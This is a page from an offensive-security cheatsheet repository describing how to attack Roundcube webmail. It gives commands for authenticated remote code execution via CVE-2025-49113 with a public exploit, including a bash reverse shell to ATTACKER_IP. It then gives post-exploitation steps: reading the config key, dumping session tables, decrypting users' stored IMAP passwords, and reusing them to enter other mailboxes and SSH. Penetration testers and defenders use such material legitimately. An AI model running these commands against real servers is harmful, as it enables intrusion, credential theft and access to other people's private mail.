daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

roundcube.md (5579B)


      1 ---
      2 title: "Roundcube"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/roundcube.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/roundcube.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Roundcube
     14 
     15 ## Overview
     16 
     17 Roundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:
     18 - HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)
     19 - Default app path in containers/VMs: /var/www/html/roundcube
     20 - Main config: config/config.inc.php
     21 
     22 ## Authenticated RCE via PHP object deserialization (CVE-2025-49113)
     23 
     24 Affected versions (per vendor/NVD):<sup>[[1]](#references)[[2]](#references)</sup>
     25 - 1.6.x before 1.6.11
     26 - 1.5.x before 1.5.10
     27 
     28 Bug summary
     29 - The _from parameter in program/actions/settings/upload.php is not validated, enabling injection of attacker‑controlled data that Roundcube later unserializes, leading to gadget chain execution and remote code execution in the web context (post‑auth).<sup>[[3]](#references)</sup>
     30 
     31 Quick exploitation
     32 - Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)
     33 - Public PoC automates session handling, gadget crafting and upload flow<sup>[[4]](#references)</sup>
     34 
     35 ```bash
     36 git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
     37 php CVE-2025-49113.php http://mail.target.tld USER PASS CMD
     38 
     39 # examples
     40 php CVE-2025-49113.php http://mail.target.tld user 'pass' "id"
     41 # blind timing proof
     42 time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5"
     43 
     44 # reverse shell
     45 nc -nvlp 443
     46 php CVE-2025-49113.php http://mail.target.tld user 'pass' \
     47   "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"
     48 ```
     49 
     50 Notes
     51 - Output is often blind; use sleep N to validate RCE
     52 - The resulting process inherits the account and confinement of the PHP/web worker; determine the actual identity rather than assuming `www-data`. Container indicators such as `/.dockerenv` and private bridge routes may help characterize the environment but are not universal.
     53 
     54 ## Post‑exploitation: recover IMAP passwords from Roundcube sessions
     55 
     56 Roundcube stores the current user's IMAP password as an encrypted value in its session. With both session-backend access and the server-side `des_key`/cipher configuration, an assessor can decrypt active-session credentials. The default cipher is historically `DES-EDE3-CBC`, but `cipher_method` is configurable (for example, AES-256-CBC), so do not assume every installation uses 3DES.<sup>[[6]](#references)[[7]](#references)</sup>
     57 
     58 1) Read the DB DSN, encryption key, and cipher configuration
     59 
     60 config/config.inc.php typically contains:
     61 
     62 ```php
     63 $config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
     64 $config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES)
     65 ```
     66 
     67 2) Connect to DB and dump sessions
     68 
     69 ```bash
     70 mysql -u roundcube -p roundcube
     71 # or: mysql -u roundcube -pDB_PASS roundcube
     72 
     73 mysql> SELECT id, created, changed, vars FROM session\G
     74 ```
     75 
     76 The `session.vars` field contains serialized session state. Locate the encrypted password value (commonly the `_password` session key) and pass that ciphertext—not the entire serialized `vars` value—to the matching Roundcube decrypt routine.
     77 
     78 3) Locate the password field
     79 
     80 A quick first step is to inspect the serialized field for the password key. Exact serialization depends on the Roundcube/PHP session handler:
     81 
     82 ```bash
     83 printf '%s' 'SESSION_VARS_VALUE' | tr ';' '\n' | grep -i password
     84 ```
     85 
     86 4) Decrypt using Roundcube’s helper
     87 
     88 Roundcube ships a CLI that uses the same rcmail->decrypt() logic and the configured des_key:<sup>[[5]](#references)</sup>
     89 
     90 ```bash
     91 cd /var/www/html/roundcube
     92 ./bin/decrypt.sh CIPHERTEXT_BASE64
     93 # -> prints plaintext
     94 ```
     95 
     96 5) Manual decryption (optional; default 3DES example)
     97 
     98 - Ciphertext format: Base64( IV(8B) || CT )
     99 - Alg: 3DES-CBC, key length 24B, PKCS#7 padding
    100 
    101 ```python
    102 from base64 import b64decode
    103 iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
    104 iv, ct = iv_ct[:8], iv_ct[8:]
    105 print(iv.hex(), ct.hex())
    106 # decrypt(ct) with key = $config['des_key'], IV = iv
    107 ```
    108 
    109 Common locations
    110 - DB table: session (users table maps login names to IDs)
    111 - Config path: /var/www/html/roundcube/config/config.inc.php
    112 
    113 Operational use
    114 - Older session rows often contain prior users’ IMAP passwords; decrypt multiple entries to laterally move into other mailboxes
    115 - Try recovered credentials against SSH or other services if credential reuse is suspected
    116 
    117 ## References
    118 
    119 - [1] [Roundcube security updates 1.6.11 and 1.5.10](https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10)
    120 - [2] [CVE-2025-49113 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-49113)
    121 - [3] [Roundcube changelog — CVE-2025-49113 fix](https://github.com/roundcube/roundcubemail/blob/master/CHANGELOG.md)
    122 - [4] [hakaioffsec/CVE-2025-49113-exploit (PoC)](https://github.com/hakaioffsec/CVE-2025-49113-exploit)
    123 - [5] [Roundcube bin/decrypt.sh helper](https://raw.githubusercontent.com/roundcube/roundcubemail/master/bin/decrypt.sh)
    124 - [6] [HTB Outbound – 0xdf write‑up (Roundcube 1.6.10 → RCE → session decrypt pivot)](https://0xdf.gitlab.io/2025/11/15/htb-outbound.html)
    125 - [7] [Roundcube default configuration — `des_key` and `cipher_method`](https://github.com/roundcube/roundcubemail/blob/master/config/defaults.inc.php)